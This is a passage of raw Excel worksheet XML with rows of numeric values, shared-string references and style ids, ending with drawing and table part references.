      </c>
    </row>
    <row r="358">
      <c r="A358" s="101">
        <v>118.0</v>
      </c>
      <c r="B358" s="102" t="s">
        <v>86</v>
      </c>
      <c r="C358" s="125" t="s">
        <v>2272</v>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="106">
        <v>120.0</v>
      </c>
      <c r="B359" s="107" t="s">
        <v>86</v>
      </c>
      <c r="C359" s="126" t="s">
        <v>2275</v>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="101">
        <v>156.0</v>
      </c>
      <c r="B360" s="102" t="s">
        <v>86</v>
      </c>
      <c r="C360" s="125" t="s">
        <v>2278</v>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="106">
        <v>177.0</v>
      </c>
      <c r="B361" s="107" t="s">
        <v>86</v>
      </c>
      <c r="C361" s="126" t="s">
        <v>2281</v>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="101">
        <v>179.0</v>
      </c>
      <c r="B362" s="102" t="s">
        <v>86</v>
      </c>
      <c r="C362" s="125" t="s">
        <v>2284</v>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="106">
        <v>184.0</v>
      </c>
      <c r="B363" s="107" t="s">
        <v>86</v>
      </c>
      <c r="C363" s="126" t="s">
        <v>2287</v>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="101">
        <v>199.0</v>
      </c>
      <c r="B364" s="102" t="s">
        <v>86</v>
      </c>
      <c r="C364" s="125" t="s">
        <v>2290</v>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="106">
        <v>201.0</v>
      </c>
      <c r="B365" s="107" t="s">
        <v>86</v>
      </c>
      <c r="C365" s="126" t="s">
        <v>2293</v>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="101">
        <v>202.0</v>
      </c>
      <c r="B366" s="102" t="s">
        <v>86</v>
      </c>
      <c r="C366" s="125" t="s">
        <v>2296</v>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="106">
        <v>209.0</v>
      </c>
      <c r="B367" s="107" t="s">
        <v>86</v>
      </c>
      <c r="C367" s="126" t="s">
        <v>2299</v>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="101">
        <v>221.0</v>
      </c>
      <c r="B368" s="102" t="s">
        <v>86</v>
      </c>
      <c r="C368" s="125" t="s">
        <v>2302</v>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="106">
        <v>226.0</v>
      </c>
      <c r="B369" s="107" t="s">
        <v>86</v>
      </c>
      <c r="C369" s="126" t="s">
        <v>2305</v>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="101">
        <v>235.0</v>
      </c>
      <c r="B370" s="102" t="s">
        <v>86</v>
      </c>
      <c r="C370" s="125" t="s">
        <v>2308</v>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="106">
        <v>237.0</v>
      </c>
      <c r="B371" s="107" t="s">
        <v>86</v>
      </c>
      <c r="C371" s="126" t="s">
        <v>2311</v>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="101">
        <v>249.0</v>
      </c>
      <c r="B372" s="102" t="s">
        <v>86</v>
      </c>
      <c r="C372" s="125" t="s">
        <v>2314</v>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="106">
        <v>16.0</v>
      </c>
      <c r="B373" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C373" s="126" t="s">
        <v>2317</v>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="101">
        <v>26.0</v>
      </c>
      <c r="B374" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C374" s="125" t="s">
        <v>2320</v>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="106">
        <v>37.0</v>
      </c>
      <c r="B375" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C375" s="126" t="s">
        <v>2323</v>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="101">
        <v>82.0</v>
      </c>
      <c r="B376" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C376" s="125" t="s">
        <v>2326</v>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="106">
        <v>93.0</v>
      </c>
      <c r="B377" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C377" s="126" t="s">
        <v>2329</v>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="101">
        <v>166.0</v>
      </c>
      <c r="B378" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C378" s="125" t="s">
        <v>2332</v>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="106">
        <v>214.0</v>
      </c>
      <c r="B379" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C379" s="126" t="s">
        <v>2335</v>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="101">
        <v>409.0</v>
      </c>
      <c r="B380" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C380" s="125" t="s">
        <v>2338</v>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="106">
        <v>543.0</v>
      </c>
      <c r="B381" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C381" s="126" t="s">
        <v>2344</v>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="101">
        <v>568.0</v>
      </c>
      <c r="B382" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C382" s="125" t="s">
        <v>2347</v>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="106">
        <v>861.0</v>
      </c>
      <c r="B383" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C383" s="126" t="s">
        <v>2353</v>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="101">
        <v>913.0</v>
      </c>
      <c r="B384" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C384" s="125" t="s">
        <v>2356</v>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="106">
        <v>1036.0</v>
      </c>
      <c r="B385" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C385" s="126" t="s">
        <v>2359</v>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="101">
        <v>1064.0</v>
      </c>
      <c r="B386" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C386" s="125" t="s">
        <v>2362</v>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="106">
        <v>1160.0</v>
      </c>
      <c r="B387" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C387" s="126" t="s">
        <v>2365</v>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="101">
        <v>1239.0</v>
      </c>
      <c r="B388" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C388" s="125" t="s">
        <v>2371</v>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="106">
        <v>1436.0</v>
      </c>
      <c r="B389" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C389" s="126" t="s">
        <v>2374</v>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="101">
        <v>1722.0</v>
      </c>
      <c r="B390" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C390" s="125" t="s">
        <v>2377</v>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="106">
        <v>1776.0</v>
      </c>
      <c r="B391" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C391" s="126" t="s">
        <v>2383</v>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="101">
        <v>1808.0</v>
      </c>
      <c r="B392" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C392" s="125" t="s">
        <v>2386</v>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="106">
        <v>1838.0</v>
      </c>
      <c r="B393" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C393" s="126" t="s">
        <v>2389</v>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="101">
        <v>1884.0</v>
      </c>
      <c r="B394" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C394" s="125" t="s">
        <v>2392</v>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="106">
        <v>1917.0</v>
      </c>
      <c r="B395" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C395" s="126" t="s">
        <v>2395</v>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="101">
        <v>2039.0</v>
      </c>
      <c r="B396" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C396" s="125" t="s">
        <v>2406</v>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="106">
        <v>2125.0</v>
      </c>
      <c r="B397" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C397" s="126" t="s">
        <v>2412</v>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="101">
        <v>2371.0</v>
      </c>
      <c r="B398" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C398" s="125" t="s">
        <v>2418</v>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="106">
        <v>2434.0</v>
      </c>
      <c r="B399" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C399" s="126" t="s">
        <v>2431</v>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="101">
        <v>2583.0</v>
      </c>
      <c r="B400" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C400" s="125" t="s">
        <v>2434</v>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="106">
        <v>2593.0</v>
      </c>
      <c r="B401" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C401" s="126" t="s">
        <v>2437</v>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="101">
        <v>2648.0</v>
      </c>
      <c r="B402" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C402" s="125" t="s">
        <v>2440</v>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="106">
        <v>3467.0</v>
      </c>
      <c r="B403" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C403" s="126" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="101">
        <v>3476.0</v>
      </c>
      <c r="B404" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C404" s="125" t="s">
        <v>2446</v>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="106">
        <v>4088.0</v>
      </c>
      <c r="B405" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C405" s="126" t="s">
        <v>2449</v>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="101">
        <v>4270.0</v>
      </c>
      <c r="B406" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C406" s="125" t="s">
        <v>2455</v>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="106">
        <v>5155.0</v>
      </c>
      <c r="B407" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C407" s="126" t="s">
        <v>2470</v>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="101">
        <v>5213.0</v>
      </c>
      <c r="B408" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C408" s="125" t="s">
        <v>2473</v>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="106">
        <v>5864.0</v>
      </c>
      <c r="B409" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C409" s="126" t="s">
        <v>2479</v>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="101">
        <v>6262.0</v>
      </c>
      <c r="B410" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C410" s="125" t="s">
        <v>2482</v>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="106">
        <v>6497.0</v>
      </c>
      <c r="B411" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C411" s="126" t="s">
        <v>2489</v>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="101">
        <v>6576.0</v>
      </c>
      <c r="B412" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C412" s="125" t="s">
        <v>2492</v>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="106">
        <v>19.0</v>
      </c>
      <c r="B413" s="107" t="s">
        <v>92</v>
      </c>
      <c r="C413" s="126" t="s">
        <v>2508</v>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="101">
        <v>91.0</v>
      </c>
      <c r="B414" s="102" t="s">
        <v>92</v>
      </c>
      <c r="C414" s="125" t="s">
        <v>2511</v>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="106">
        <v>95.0</v>
      </c>
      <c r="B415" s="107" t="s">
        <v>92</v>
      </c>
      <c r="C415" s="126" t="s">
        <v>2514</v>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="101">
        <v>103.0</v>
      </c>
      <c r="B416" s="102" t="s">
        <v>92</v>
      </c>
      <c r="C416" s="125" t="s">
        <v>2517</v>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="106">
        <v>135.0</v>
      </c>
      <c r="B417" s="107" t="s">
        <v>92</v>
      </c>
      <c r="C417" s="126" t="s">
        <v>2520</v>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="101">
        <v>175.0</v>
      </c>
      <c r="B418" s="102" t="s">
        <v>92</v>
      </c>
      <c r="C418" s="125" t="s">
        <v>2523</v>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="106">
        <v>177.0</v>
      </c>
      <c r="B419" s="107" t="s">
        <v>92</v>
      </c>
      <c r="C419" s="126" t="s">
        <v>2526</v>
      </c>
    </row>
    <row r="420">
      <c r="A420" s="101">
        <v>187.0</v>
      </c>
      <c r="B420" s="102" t="s">
        <v>92</v>
      </c>
      <c r="C420" s="125" t="s">
        <v>2529</v>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="106">
        <v>190.0</v>
      </c>
      <c r="B421" s="107" t="s">
        <v>92</v>
      </c>
      <c r="C421" s="126" t="s">
        <v>2532</v>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="101">
        <v>236.0</v>
      </c>
      <c r="B422" s="102" t="s">
        <v>92</v>
      </c>
      <c r="C422" s="125" t="s">
        <v>2538</v>
      </c>
    </row>
    <row r="423">
      <c r="A423" s="106">
        <v>242.0</v>
      </c>
      <c r="B423" s="107" t="s">
        <v>92</v>
      </c>
      <c r="C423" s="126" t="s">
        <v>2541</v>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="101">
        <v>369.0</v>
      </c>
      <c r="B424" s="102" t="s">
        <v>92</v>
      </c>
      <c r="C424" s="125" t="s">
        <v>2545</v>
      </c>
    </row>
    <row r="425">
      <c r="A425" s="106">
        <v>387.0</v>
      </c>
      <c r="B425" s="107" t="s">
        <v>92</v>
      </c>
      <c r="C425" s="126" t="s">
        <v>2548</v>
      </c>
    </row>
    <row r="426">
      <c r="A426" s="101">
        <v>403.0</v>
      </c>
      <c r="B426" s="102" t="s">
        <v>92</v>
      </c>
      <c r="C426" s="125" t="s">
        <v>2554</v>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="106">
        <v>410.0</v>
      </c>
      <c r="B427" s="107" t="s">
        <v>92</v>
      </c>
      <c r="C427" s="126" t="s">
        <v>2557</v>
      </c>
    </row>
    <row r="428">
      <c r="A428" s="101">
        <v>412.0</v>
      </c>
      <c r="B428" s="102" t="s">
        <v>92</v>
      </c>
      <c r="C428" s="125" t="s">
        <v>2560</v>
      </c>
    </row>
    <row r="429">
      <c r="A429" s="106">
        <v>466.0</v>
      </c>
      <c r="B429" s="107" t="s">
        <v>92</v>
      </c>
      <c r="C429" s="126" t="s">
        <v>2571</v>
      </c>
    </row>
    <row r="430">
      <c r="A430" s="101">
        <v>489.0</v>
      </c>
      <c r="B430" s="102" t="s">
        <v>92</v>
      </c>
      <c r="C430" s="125" t="s">
        <v>2574</v>
      </c>
    </row>
    <row r="431">
      <c r="A431" s="106">
        <v>493.0</v>
      </c>
      <c r="B431" s="107" t="s">
        <v>92</v>
      </c>
      <c r="C431" s="126" t="s">
        <v>2578</v>
      </c>
    </row>
    <row r="432">
      <c r="A432" s="101">
        <v>550.0</v>
      </c>
      <c r="B432" s="102" t="s">
        <v>92</v>
      </c>
      <c r="C432" s="125" t="s">
        <v>2581</v>
      </c>
    </row>
    <row r="433">
      <c r="A433" s="106">
        <v>630.0</v>
      </c>
      <c r="B433" s="107" t="s">
        <v>92</v>
      </c>
      <c r="C433" s="126" t="s">
        <v>2584</v>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="101">
        <v>654.0</v>
      </c>
      <c r="B434" s="102" t="s">
        <v>92</v>
      </c>
      <c r="C434" s="125" t="s">
        <v>2587</v>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="106">
        <v>657.0</v>
      </c>
      <c r="B435" s="107" t="s">
        <v>92</v>
      </c>
      <c r="C435" s="126" t="s">
        <v>2590</v>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="101">
        <v>72.0</v>
      </c>
      <c r="B436" s="102" t="s">
        <v>112</v>
      </c>
      <c r="C436" s="125" t="s">
        <v>2818</v>
      </c>
    </row>
    <row r="437">
      <c r="A437" s="106">
        <v>90.0</v>
      </c>
      <c r="B437" s="107" t="s">
        <v>112</v>
      </c>
      <c r="C437" s="126" t="s">
        <v>2821</v>
      </c>
    </row>
    <row r="438">
      <c r="A438" s="101">
        <v>91.0</v>
      </c>
      <c r="B438" s="102" t="s">
        <v>112</v>
      </c>
      <c r="C438" s="125" t="s">
        <v>2824</v>
      </c>
    </row>
    <row r="439">
      <c r="A439" s="106">
        <v>164.0</v>
      </c>
      <c r="B439" s="107" t="s">
        <v>112</v>
      </c>
      <c r="C439" s="126" t="s">
        <v>2827</v>
      </c>
    </row>
    <row r="440">
      <c r="A440" s="101">
        <v>166.0</v>
      </c>
      <c r="B440" s="102" t="s">
        <v>112</v>
      </c>
      <c r="C440" s="125" t="s">
        <v>2830</v>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="106">
        <v>221.0</v>
      </c>
      <c r="B441" s="107" t="s">
        <v>112</v>
      </c>
      <c r="C441" s="126" t="s">
        <v>2833</v>
      </c>
    </row>
    <row r="442">
      <c r="A442" s="101">
        <v>224.0</v>
      </c>
      <c r="B442" s="102" t="s">
        <v>112</v>
      </c>
      <c r="C442" s="125" t="s">
        <v>2836</v>
      </c>
    </row>
    <row r="443">
      <c r="A443" s="106">
        <v>228.0</v>
      </c>
      <c r="B443" s="107" t="s">
        <v>112</v>
      </c>
      <c r="C443" s="126" t="s">
        <v>2839</v>
      </c>
    </row>
    <row r="444">
      <c r="A444" s="101">
        <v>229.0</v>
      </c>
      <c r="B444" s="102" t="s">
        <v>112</v>
      </c>
      <c r="C444" s="125" t="s">
        <v>2842</v>
      </c>
    </row>
    <row r="445">
      <c r="A445" s="106">
        <v>290.0</v>
      </c>
      <c r="B445" s="107" t="s">
        <v>112</v>
      </c>
      <c r="C445" s="126" t="s">
        <v>2845</v>
      </c>
    </row>
    <row r="446">
      <c r="A446" s="101">
        <v>299.0</v>
      </c>
      <c r="B446" s="102" t="s">
        <v>112</v>
      </c>
      <c r="C446" s="125" t="s">
        <v>2848</v>
      </c>
    </row>
    <row r="447">
      <c r="A447" s="106">
        <v>330.0</v>
      </c>
      <c r="B447" s="107" t="s">
        <v>112</v>
      </c>
      <c r="C447" s="126" t="s">
        <v>2851</v>
      </c>
    </row>
    <row r="448">
      <c r="A448" s="101">
        <v>409.0</v>
      </c>
      <c r="B448" s="102" t="s">
        <v>112</v>
      </c>
      <c r="C448" s="125" t="s">
        <v>2854</v>
      </c>
    </row>
    <row r="449">
      <c r="A449" s="106">
        <v>411.0</v>
      </c>
      <c r="B449" s="107" t="s">
        <v>112</v>
      </c>
      <c r="C449" s="126" t="s">
        <v>2857</v>
      </c>
    </row>
    <row r="450">
      <c r="A450" s="101">
        <v>414.0</v>
      </c>
      <c r="B450" s="102" t="s">
        <v>112</v>
      </c>
      <c r="C450" s="125" t="s">
        <v>2860</v>
      </c>
    </row>
    <row r="451">
      <c r="A451" s="106">
        <v>444.0</v>
      </c>
      <c r="B451" s="107" t="s">
        <v>112</v>
      </c>
      <c r="C451" s="126" t="s">
        <v>2863</v>
      </c>
    </row>
    <row r="452">
      <c r="A452" s="101">
        <v>492.0</v>
      </c>
      <c r="B452" s="102" t="s">
        <v>112</v>
      </c>
      <c r="C452" s="125" t="s">
        <v>2866</v>
      </c>
    </row>
    <row r="453">
      <c r="A453" s="106">
        <v>661.0</v>
      </c>
      <c r="B453" s="107" t="s">
        <v>112</v>
      </c>
      <c r="C453" s="126" t="s">
        <v>2869</v>
      </c>
    </row>
    <row r="454">
      <c r="A454" s="101">
        <v>862.0</v>
      </c>
      <c r="B454" s="102" t="s">
        <v>112</v>
      </c>
      <c r="C454" s="125" t="s">
        <v>2872</v>
      </c>
    </row>
    <row r="455">
      <c r="A455" s="106">
        <v>1023.0</v>
      </c>
      <c r="B455" s="107" t="s">
        <v>112</v>
      </c>
      <c r="C455" s="126" t="s">
        <v>2875</v>
      </c>
    </row>
    <row r="456">
      <c r="A456" s="101">
        <v>1143.0</v>
      </c>
      <c r="B456" s="102" t="s">
        <v>112</v>
      </c>
      <c r="C456" s="125" t="s">
        <v>2878</v>
      </c>
    </row>
    <row r="457">
      <c r="A457" s="106">
        <v>1227.0</v>
      </c>
      <c r="B457" s="107" t="s">
        <v>112</v>
      </c>
      <c r="C457" s="126" t="s">
        <v>2881</v>
      </c>
    </row>
    <row r="458">
      <c r="A458" s="101">
        <v>1310.0</v>
      </c>
      <c r="B458" s="102" t="s">
        <v>112</v>
      </c>
      <c r="C458" s="125" t="s">
        <v>2884</v>
      </c>
    </row>
    <row r="459">
      <c r="A459" s="106">
        <v>1395.0</v>
      </c>
      <c r="B459" s="107" t="s">
        <v>112</v>
      </c>
      <c r="C459" s="126" t="s">
        <v>2887</v>
      </c>
    </row>
    <row r="460">
      <c r="A460" s="101">
        <v>1548.0</v>
      </c>
      <c r="B460" s="102" t="s">
        <v>112</v>
      </c>
      <c r="C460" s="125" t="s">
        <v>2890</v>
      </c>
    </row>
    <row r="461">
      <c r="A461" s="106">
        <v>1621.0</v>
      </c>
      <c r="B461" s="107" t="s">
        <v>112</v>
      </c>
      <c r="C461" s="126" t="s">
        <v>2893</v>
      </c>
    </row>
    <row r="462">
      <c r="A462" s="101">
        <v>1763.0</v>
      </c>
      <c r="B462" s="102" t="s">
        <v>112</v>
      </c>
      <c r="C462" s="125" t="s">
        <v>2896</v>
      </c>
    </row>
    <row r="463">
      <c r="A463" s="106">
        <v>1959.0</v>
      </c>
      <c r="B463" s="107" t="s">
        <v>112</v>
      </c>
      <c r="C463" s="126" t="s">
        <v>2899</v>
      </c>
    </row>
    <row r="464">
      <c r="A464" s="101">
        <v>2309.0</v>
      </c>
      <c r="B464" s="102" t="s">
        <v>112</v>
      </c>
      <c r="C464" s="125" t="s">
        <v>2902</v>
      </c>
    </row>
    <row r="465">
      <c r="A465" s="106">
        <v>2416.0</v>
      </c>
      <c r="B465" s="107" t="s">
        <v>112</v>
      </c>
      <c r="C465" s="126" t="s">
        <v>2905</v>
      </c>
    </row>
    <row r="466">
      <c r="A466" s="101">
        <v>2426.0</v>
      </c>
      <c r="B466" s="102" t="s">
        <v>112</v>
      </c>
      <c r="C466" s="125" t="s">
        <v>2908</v>
      </c>
    </row>
    <row r="467">
      <c r="A467" s="106">
        <v>2582.0</v>
      </c>
      <c r="B467" s="107" t="s">
        <v>112</v>
      </c>
      <c r="C467" s="126" t="s">
        <v>2911</v>
      </c>
    </row>
    <row r="468">
      <c r="A468" s="101">
        <v>2587.0</v>
      </c>
      <c r="B468" s="102" t="s">
        <v>112</v>
      </c>
      <c r="C468" s="125" t="s">
        <v>2914</v>
      </c>
    </row>
    <row r="469">
      <c r="A469" s="106">
        <v>2616.0</v>
      </c>
      <c r="B469" s="107" t="s">
        <v>112</v>
      </c>
      <c r="C469" s="126" t="s">
        <v>2917</v>
      </c>
    </row>
    <row r="470">
      <c r="A470" s="101">
        <v>2730.0</v>
      </c>
      <c r="B470" s="102" t="s">
        <v>112</v>
      </c>
      <c r="C470" s="125" t="s">
        <v>2920</v>
      </c>
    </row>
    <row r="471">
      <c r="A471" s="106">
        <v>2758.0</v>
      </c>
      <c r="B471" s="107" t="s">
        <v>112</v>
      </c>
      <c r="C471" s="126" t="s">
        <v>2923</v>
      </c>
    </row>
    <row r="472">
      <c r="A472" s="101">
        <v>2803.0</v>
      </c>
      <c r="B472" s="102" t="s">
        <v>112</v>
      </c>
      <c r="C472" s="125" t="s">
        <v>2926</v>
      </c>
    </row>
    <row r="473">
      <c r="A473" s="106">
        <v>13.0</v>
      </c>
      <c r="B473" s="107" t="s">
        <v>114</v>
      </c>
      <c r="C473" s="126" t="s">
        <v>2929</v>
      </c>
    </row>
    <row r="474">
      <c r="A474" s="111">
        <v>169.0</v>
      </c>
      <c r="B474" s="112" t="s">
        <v>114</v>
      </c>
      <c r="C474" s="127" t="s">
        <v>2932</v>
      </c>
      <c r="D474" s="128"/>
    </row>
    <row r="596">
      <c r="D596" s="128"/>
    </row>
    <row r="766">
      <c r="C766" s="12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s>
  <drawing r:id="rId474"/>
  <tableParts count="1">
    <tablePart r:id="rId476"/>
  </tableParts>
</worksheet>
</file>